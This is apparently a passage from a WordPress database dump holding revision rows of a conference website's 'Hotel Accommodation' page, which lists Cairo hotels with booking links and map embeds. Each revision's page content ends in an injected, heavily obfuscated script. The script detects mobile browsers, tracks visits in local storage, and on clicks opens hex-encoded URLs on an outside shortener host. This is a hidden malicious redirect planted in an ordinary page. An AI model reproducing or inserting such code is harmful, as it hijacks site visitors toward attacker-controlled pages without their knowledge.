_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 01:09:12','2023-06-24 01:09:12','',2685,'https://gsw2023.com/?p=4789',0,'revision','',0),
(4790,1,'2023-06-24 01:09:45','2023-06-24 01:09:45','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 01:09:45','2023-06-24 01:09:45','',2685,'https://gsw2023.com/?p=4790',0,'revision','',0),
